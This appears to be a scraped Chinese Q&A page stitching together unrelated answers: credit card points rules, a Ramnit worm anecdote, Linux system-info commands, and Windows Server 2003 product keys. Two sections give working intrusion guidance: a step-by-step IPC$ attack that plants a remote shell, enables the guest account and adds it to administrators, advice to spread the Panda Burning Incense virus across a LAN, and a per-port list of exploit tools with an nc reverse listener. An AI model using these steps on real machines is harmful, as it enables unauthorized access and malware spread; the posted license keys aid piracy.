⑴ 中信银行信用卡的积分怎么使用
1、积分礼品兑换仅限主卡持卡人提出,同一持卡人名下的不同中信信用卡积分可以在兑换时合并使用,系统将按持卡人提供的卡片顺序扣除积分。不同持卡人名下的积分不能合并使用。
2、持卡人可使用“积分”或“积分+自付金额”的方式兑换礼品,若客户选择“积分+自付金额”的方式的,仅能使用持卡人申请时提交的中信信用卡作为支付工具。信用卡额度不足时,系统将自动取消兑换申请。
3、持卡人只能为自己名下的主卡或附属卡提出积分兑换年费的申请,不能为其他卡片提出兑换年费的申请,年费兑换每卡每年仅限申请一次。且年费兑换期限为第一年年费产生后的次年年费开始,第一年年费不得使用积分兑换。请务必在年费账单产生后向卡中心提出积分兑换年费申请。
4、持卡人兑换的航空公司飞行里程/飞行积点的使用方法请参照并遵守各航空公司公布的服务条款与细则。
⑵ 局域网内如何将病毒传到其他电脑.
1.在网吧最好用139端口入侵
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:\> srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\>net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\> ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活
11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)
2.在家,要看人家有没有装arp防火墙如果没装,最直接的就是熊猫烧香,下载一个熊猫烧香样本,之后让自己的电脑感染上,之后他就会在整个局域网传染。
⑶ 有文件后面带SRV后缀,是什么意思
亲测这是Ramnit.b蠕虫病毒,我之前也被这个病毒恶心到了。这个病毒的原理简单的说就是,打开了一个带有这个病毒的文件,他就会在C盘的一个Microsoft文件夹里伪装成系统文件,以后你每打开一个EXE文件,他会自动生成一个同样名字的病毒(比如1.EXE,就会生成1Srv.EXE),这种情况,你只能用杀毒软件全盘杀毒,当时我不知道,以为是电脑出问题了没上心,过了1年多,有网友告诉我是病毒,我用杀毒软件一查,8万多文件被感染,总共将近1T的文件被迫删除,问题解决,幸运的是中毒的全是游戏而不是能泄露隐私的文件。纯手打并亲自试过,求赞同
⑷ 哪些端口可以用哪些漏洞入侵~悬赏100~回答的好且详细追加100
希望对新手入侵有帮助!
1. 1433端口入侵
scanport.exe 查有1433的机器
SQLScanPass.exe 进行字典暴破(字典是关键)
最后 SQLTools.exe入侵
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器
3. 3899的入侵
对很早的机器,可以试试3389的溢出(win3389ex.exe)
对2000的机器,可以试试字典暴破。(tscrack.exe)
4. 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(啊D的注入软件)。
5. serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵。
9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
经典IPC$入侵
1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连
接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名
,输入administrators,命令即可成功完成。
2. C:\> srv.exe $">\\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的
c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\>net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
5. C:\>net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备
开始下面的命令。
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的
是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打
算建立一个Telnet服务!这就要用到ntlm了
7.C:\> ntlm.exe $">\\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这
个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使
用"net start telnet"来开启Telnet服务!
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作
一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活
11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我
们可以用guest再次访问这台计算机)
⑸ cn_win_srv_2003_r2_standard_x64_with_sp2_cd1_X13-28810 的序号
RYCR6-T7Y6M-2TVHK-C2YW3-7TYQ8,MR78C-GF2CY-KC864-DTG74-VMT73附其他2003版本序列号。未验证。
物品简介:序列号就是软件开发商给软件的一个识别码,和人的身份证号码类似,其作用主要是为了防止自己的软件被用户盗用。用户要使用其软件就必须知道序列号。在用户注册或购买产品时生成唯一的识别码,一般称作机器码,也叫认证码、注册申请码等。
一般用途:
序列号在信息技术大量运用、物联网初步成型的时期用于电子设备身份识别。为了识别的准确性,序列号都为全球唯一的号码。
早在20世纪,序列号就已用于系统软件的防伪、激活等操作。
而在移动电话(手机)大规模普及的时代,一部手机往往有至少1个序列号。
⑹ 如何查询服务器vmware 版本
linux下看配置,可没有windows那么直观。你只能一个一个查看。
一:cpu[root@srv /]# more /proc/cpuinfo | grep "modelname"
[root@srv /]# grep "model name"/proc/cpuinfo
二:内存[root@srv /]# grep MemTotal /proc/meminfo
三:查看CPU位数(32 or 64)[root@srv /]# getconf LONG_BIT32四:查看linux版本[root@srv /]# more /etc/redhat-releaseCentOSrelease 5 (Final)[root@srv /]# more /etc/issueCentOS release 5 (Final)Kernel \r on an \m
五:查看内核版本[root@srv /]# uname-r2.6.18-92.1.18.el5.028stab060.2PAE[root@srv /]# uname -aLinux srv.eddiechen.cn2.6.18-92.1.18.el5.028stab060.2PAE #1 SMP Tue Jan 13 12:31:30 MSK2009 i686 i686 i386 GNU/Linux六:查看时区[root@srv /]# date -RWed, 25 Feb 200902:20:50 +0000[root@srv /]# mv /etc/localtime/etc/localtime.save[root@srv /]# cp /usr/share/zoneinfo/Asia/Shanghai/etc/localtime[root@srv /]# date -RWed, 25 Feb 200910:24:26 +0800七:主机名[root@srv /]# hostnamesrv.eddiechen.cn八:查看selinux情况[root@srv /]# sestatusSELinuxstatus:
disabled九:网络IP[root@srv /]# ifconfig | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'207.154.202.216网关[root@srv /]# cat /etc/sysconfig/networkNETWORKING="yes"GATEWAY="192.0.2.1"HOSTNAME="srv.eddiechen.cn"dns[root@srv /]# cat /etc/resolv.confnameserver208.74.168.131nameserver 208.74.168.132nameserver 4.2.2.1十:已经安装的软件包[root@srv /]# rpm -qa | wc -l197[root@srv /]# yum list installed | wc-l198十一:磁盘和分区[root@srv /]# df-hFilesystem Size Used AvailUse % Mountedon/dev/simfs 10G 353M 9.7G 4% /[root@srv /]# -sh353M[root@srv /]# /etc-sh4.6M /etc